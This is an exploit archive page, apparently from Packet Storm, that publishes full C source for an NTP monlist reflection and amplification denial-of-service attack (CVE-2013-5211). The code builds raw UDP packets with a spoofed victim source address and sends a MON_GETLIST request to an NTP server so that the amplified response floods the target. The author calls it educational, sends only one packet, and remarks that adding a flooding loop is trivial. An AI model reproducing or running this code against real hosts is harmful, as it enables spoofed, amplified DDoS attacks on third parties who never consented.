exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NTP DDoS Amplification

NTP DDoS Amplification
Posted Apr 28, 2014
Authored by Danilo PC

NTP ntpd monlist query reflection denial of service exploit.

tags | exploit, denial of service
advisories | CVE-2013-5211
SHA-256 | fc458431c984a824aac0863ef7422ed300c3dc830b42f819b52b5db6f76ba518

NTP DDoS Amplification

Change Mirror Download
/*
NTP DDoS amplification - C Language - Linux/x86
Copyright (C) 2013 Danilo P.C.

DaNotKnow@gmail.com

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/

/*
Special Thanks to:
Alfredo (1phee3@gmail.com)
NTP Team (www.ntp.org)
*/

/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)
* I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,
* if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.
*/

//------------------------------------------------------------------------------------------------//
//------------------------------------------------------------------------------------------------//


#include <stdio.h> //For on printf function
#include <string.h> //For memset
#include <sys/socket.h> //Structs and Functions used for sockets operations.
#include <stdlib.h> //For exit function
#include <netinet/ip.h> //Structs for IP header

//Struct for UDP Packet
struct udpheader{
unsigned short int udp_sourcePortNumber;
unsigned short int udp_destinationPortNumber;
unsigned short int udp_length;
unsigned short int udp_checksum;
};

// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler
struct ntpreqheader {
unsigned char rm_vn_mode; /* response, more, version, mode */
unsigned char auth_seq; /* key, sequence number */
unsigned char implementation; /* implementation number */
unsigned char request; /* request number */
unsigned short err_nitems; /* error code/number of data items */
unsigned short mbz_itemsize; /* item size */
char data[40]; /* data area [32 prev](176 byte max) */
unsigned long tstamp; /* time stamp, for authentication */
unsigned int keyid; /* encryption key */
char mac[8]; /* (optional) 8 byte auth code */
};


// Calculates the checksum of the ip header.
unsigned short csum(unsigned short *ptr,int nbytes)
{
register long sum;
unsigned short oddbyte;
register short answer;

sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}

sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}


//Da MAIN

int main(int argc, char **argv)
{
int status; // Maintains the return values of the functions
struct iphdr *ip; // Pointer to ip header struct
struct udpheader *udp; // Pointer to udp header struct
struct ntpreqheader *ntp; // Pointer to ntp request header struct
int sockfd; // Maintains the socket file descriptor
int one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.
struct sockaddr_in dest; // Maintains the data of the destination address
char packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself

// Parameters check
if( argc != 3){
printf("Usage: ./ntpDdos [Target IP] [NTP Server IP]\n");
printf("Example: ./ntpDdos 1.2.3.4 127.0.0.1 \n");
printf("Watch it on wireshark!\n");
printf("Coded for education purpose only!\n");
exit(1);
}

// Create a socket and tells the kernel that we want to use udp as layer 4 protocol
sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
if (sockfd == -1){
printf("Error on initializing the socket\n");
exit(1);
}



//Sets the option IP_HDRINCL
status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);
if (status == -1){
printf("Error on setting the option HDRINCL on socket\n");
exit(1);
}


//"Zeroes" all the packet stack
memset( packet, 0, sizeof(packet) );


//Mounts the packet headers
// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!
ip = (struct iphdr *)packet;
udp = (struct udpheader *) (packet + sizeof(struct iphdr) );
ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );


//Fill the IP Header
ip->version = 4; //IPv4
ip->ihl = 5; //Size of the Ip header, minimum 5
ip->tos = 0; //Type of service, the default value is 0
ip->tot_len = sizeof(packet); //Size of the datagram
ip->id = htons(1234); //LengthIdentification Number
ip->frag_off = 0; //Flags, zero represents reserved
ip->ttl = 255; //Time to Live. Maximum of 255
ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol
ip->check = 0; //Checksum.
ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)
ip->daddr = inet_addr( argv[2] ); //Destination IP

//Fills the UDP Header
udp->udp_sourcePortNumber = htons( atoi( "123" ) ); //Source Port
udp->udp_destinationPortNumber = htons(atoi("123")) ; //Destination Port
udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet
udp->udp_checksum = 0; //Checksum

//Calculate the checksums
ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header

//Sets the destination data
dest.sin_family = AF_INET; // Address Family Ipv4
dest.sin_port = htons (atoi( "123" ) ) ; // Destination port
dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere├žo para onde se quer enviar o pacote

//Fills the NTP header
//Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST
//To do this we can import the ntp_types.h and use its structures and macros. To simplify i've created a simple version of the
// ntp request packet and hardcoded the values for the fields to make a "MON_GETLIST" request packet.
// To learn more, read this: http://searchcode.com/codesearch/view/451164#127
ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7
ntp->implementation=0x03; //Sets the implementation to 3
ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )
//All the other fields of the struct are zeroed


// Sends the packets
status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );
if(status <0){
printf("Failed to send the packets\n");
exit(1);
}


}





Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close